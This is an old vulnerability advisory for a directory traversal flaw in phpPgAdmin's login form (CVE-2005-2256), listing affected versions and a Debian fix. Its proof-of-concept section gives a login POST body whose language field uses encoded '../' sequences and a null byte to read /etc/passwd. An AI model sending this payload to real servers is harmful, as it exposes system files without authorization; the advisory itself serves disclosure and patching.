PHPPGAdmin Login Form Directory Traversal Vulnerability
BID:14142
Info
PHPPGAdmin Login Form Directory Traversal Vulnerability
| Bugtraq ID: | 14142 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-2256 CVE-2005-2256 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 05 2005 12:00AM |
| Updated: | Mar 19 2015 09:19AM |
| Credit: | Discovery is credited to <[email protected]>. |
| Vulnerable: |
phpPgAdmin phpPgAdmin 3.5.3 phpPgAdmin phpPgAdmin 3.5.2 phpPgAdmin phpPgAdmin 3.4.1 phpPgAdmin phpPgAdmin 3.4 phpPgAdmin phpPgAdmin 3.3 phpPgAdmin phpPgAdmin 3.2 phpPgAdmin phpPgAdmin 3.1 |
| Not Vulnerable: | |
Discussion
PHPPGAdmin Login Form Directory Traversal Vulnerability
phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.
All versions of phpPgAdmin are considered to be vulnerable at the moment.
phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.
All versions of phpPgAdmin are considered to be vulnerable at the moment.
Exploit / POC
PHPPGAdmin Login Form Directory Traversal Vulnerability
An exploit is not required.
The following proof of concept is available:
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login
An exploit is not required.
The following proof of concept is available:
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login
Solution / Fix
PHPPGAdmin Login Form Directory Traversal Vulnerability
Solution:
Debian has released advisory DSA 759-1 to address this issue. Please see the referenced advisory for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Debian has released advisory DSA 759-1 to address this issue. Please see the referenced advisory for more information.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHPPGAdmin Login Form Directory Traversal Vulnerability
References:
References:
- phpPgAdmin Homepage (phpPgAdmin)